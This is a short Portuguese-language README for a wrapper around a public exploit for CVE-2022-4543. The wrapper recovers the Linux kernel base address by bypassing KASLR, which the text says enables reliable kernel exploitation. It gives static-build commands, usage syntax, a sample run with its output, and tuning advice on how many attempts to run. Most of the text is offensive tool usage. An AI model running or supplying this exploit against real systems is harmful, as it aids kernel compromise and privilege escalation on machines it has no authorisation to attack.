
Invólucro para o exploit CVE-2022-4543 que desrandomiza o endereço base do kernel através de bypass do KASLR, permitindo uma exploração confiável do kernel em sistemas Linux afetados.
Este é um wrapper do exploit CVE-2022-4543 do willsroot para ajudá-lo a encontrar e obter o endereço base do kernel.
Baseie-se na sua necessidade (Opcional):
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main
Para alguns sistemas operacionais, instale a libc estática primeiro.
./main
[*] Uso: ./binary dekaslr_path entry_SYSCALL_64_offset(em hex) max_loop
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200
Depois de executar ambos os programas, ele fornecerá o endereço mais frequente com base no seu offset.
Na prática, o endereço real da base do kernel aparecerá em mais de 1/4 do total de tentativas. Recomenda-se mais de 100 tentativas.